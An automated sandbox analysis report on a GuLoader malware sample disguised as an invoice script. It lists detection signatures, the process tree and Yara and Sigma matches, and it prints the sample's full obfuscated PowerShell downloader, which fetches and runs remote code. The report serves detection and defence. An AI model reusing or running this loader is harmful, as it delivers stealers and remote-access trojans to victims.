Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE pdf.wsf

Overview

General Information

Sample name:INVOICE pdf.wsf
Analysis ID:1428858
MD5:62a9fb211e083aefa46e2a82cbef11bc
SHA1:f1e75cf66bbaf1ea3535bfe188f11d08dac775c8
SHA256:7bf66677d4f93167a77e217bcf72899ffdbcd62cb79688fa7e7346ac91a14678
Tags:guloaderwsf
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7508 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7536 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 7604 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7984 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 8072 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7732INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x5cb09:$b2: ::FromBase64String(
          • 0x153ce2:$b2: ::FromBase64String(
          • 0x153d23:$b2: ::FromBase64String(
          • 0x153d65:$b2: ::FromBase64String(
          • 0x153da8:$b2: ::FromBase64String(
          • 0x153dec:$b2: ::FromBase64String(
          • 0x153e31:$b2: ::FromBase64String(
          • 0x153e77:$b2: ::FromBase64String(
          • 0x153ebe:$b2: ::FromBase64String(
          • 0x153f06:$b2: ::FromBase64String(
          • 0x153f4f:$b2: ::FromBase64String(
          • 0x153f99:$b2: ::FromBase64String(
          • 0x153fe4:$b2: ::FromBase64String(
          • 0x154030:$b2: ::FromBase64String(
          • 0x348690:$b2: ::FromBase64String(
          • 0x9805f:$s1: -join
          • 0x9809a:$s1: -join
          • 0x98163:$s1: -join
          • 0x98191:$s1: -join
          • 0x98353:$s1: -join
          • 0x98376:$s1: -join
          Click to see the 1 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi32_7984.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xe346:$b2: ::FromBase64String(
          • 0xd3ef:$s1: -join
          • 0x6b9b:$s4: +=
          • 0x6c5d:$s4: +=
          • 0xae84:$s4: +=
          • 0xcfa1:$s4: +=
          • 0xd28b:$s4: +=
          • 0xd3d1:$s4: +=
          • 0x1797f:$s4: +=
          • 0x179ff:$s4: +=
          • 0x17ac5:$s4: +=
          • 0x17b45:$s4: +=
          • 0x17d1b:$s4: +=
          • 0x17d9f:$s4: +=
          • 0xdbdc:$e4: Get-WmiObject
          • 0xddcb:$e4: Get-Process
          • 0xde23:$e4: Start-Process
          • 0x16489:$e4: Get-Process

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf", ProcessId: 7508, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw 